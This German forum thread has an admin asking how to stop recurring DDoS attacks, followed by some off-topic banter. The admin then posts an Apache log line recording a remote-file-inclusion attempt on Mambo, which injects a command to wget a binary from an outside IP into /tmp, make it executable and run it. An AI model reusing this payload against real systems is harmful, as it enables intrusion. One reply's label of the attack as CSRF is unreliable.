Ã?fters mal DDOs Attacken

[wecki]

Hallo,

ich werde in der letzten zeit öfters mal (alle 2 Wochen) Opfer einer DDOS Attacke.

Was kann ich dagegen tun bzw. wie verhindere ich diese?

Die DDOS Attacken hauen gewaltig in meinen traffic rein und außerdem legen Sie mich immer für ca. 12 Stunden lahm.

Gibt es irgend etwas wie ich mittels IP tables oder ähnlichem sowas verhindern kann?

Unter dem motto 3 Anfragen in einer Sekunde und die IP wird geblockt?
Und erst in 12 Stunden wieder freigegeben?

Sind alles naürlich nur fiktive Zahlen...

Aber irgendwas muss ich doch amchen können...

[dodolin]

Gegen den Traffic kannst du gar nichts machen, ausser dein ISP bietet eine externe, vorgeschaltete Firewall^WPaketfilter an. Wenn der Traffic aber auf Ports kommt, auf denen du Dienste anbieten möchtest, hast du selbst damit keine Chance. IPtables und Co. wird dir auch nicht helfen, da der ISP den Traffic eigentlich immer schon zählt, bevor er deinen Rechner erreicht.

[wecki]

Und gegen den erfolgreichen DOS kann ich auch nichts tun?

Oder wehnigstens den Dienst abschalten wenn ein DOS bemerkt wird und mich dann Benachrichtigen?

Wie soll ich nun vorgehen?

[tischi]

könntest zum beispiel mit der bwbar dein out/in traffic generieren, mit einem Script auslesen und dann mit If schleifen maßnahmen ergreifen.

[Roger Wilco]

[...]und dann mit If schleifen [...]

Argh, woher kommt dieser Ausdruck nur? :evil: (Wenn es ein kotzendes Smily gäbe, würde ich das jetzt benutzen...)

[aubergine]

[...]und dann mit If schleifen [...]

Argh, woher kommt dieser Ausdruck nur? :evil: (Wenn es ein kotzendes Smily gäbe, würde ich das jetzt benutzen...)

Turbo Pascal :-D

[Roger Wilco]

Ich habe damals auch in Turbo Pascal programmiert, aber If Schleifen sind mir weder in Pascal noch einer anderen Sprache über den Weg gelaufen.

[aubergine]

Unsere !Lehrerin! damals hat immer die wörter If und When Schleifen benutzt.

[wecki]

Ich glaub ich hab was zur DOS gefunden...




Allerdings weis ich net was des sein soll...

Sieht leicht aus wie als hätte wer versucht was via wget zu laden und des dann auszuführen....

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\
x01.1

Wenn ich alle %20 durch leerzeichen ersetze bekommt es form:

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd /tmp;wget 209.136.48.69/micu;chmod 744 micu;./micu;echo YYY;echo|  HTTP\
x01.1

Aber was soll des sein? micu... noch nie gehört...[/quote]

[legato]

Ich poste ja unger offtopic, aber den muss ich jetzt bringen:

If Schleifen :roll:

[killerboy]

Hi,

wenn ich mich recht entsinne ist das ein Angriff auf Mambo, da jemand versucht mit der Variablen "mosConfig_absolute_path" fremden Code einzuschleusen...

[aubergine]

Ja schon klar das es eine Bedingung oder Verzweigung ist und keine Schleife.

Meine Posts sollten wohl sowas wie "Computer Umgangssprache" ausdrücken.

*Müsst euch nit aufregen, is umsonst*
:arrow: 8)

[Anonymous]

Code: Select all

[Tue Dec 27 00:30:15 2005] [error] [client 65.202.73.207] request failed: erroneous characters after protocol string: GET /ind
ex2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute
_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\
x01.1

[/quote]

Das nennt sich CrossSite Request Frogeries. Der Angreifer versucht auf das Backend deines CMS (Joomla oder Mambo dürfte das sein, laut URL) zuzugreifen.
http://de.wikipedia.org/wiki/Cross-Site_Request_Forgery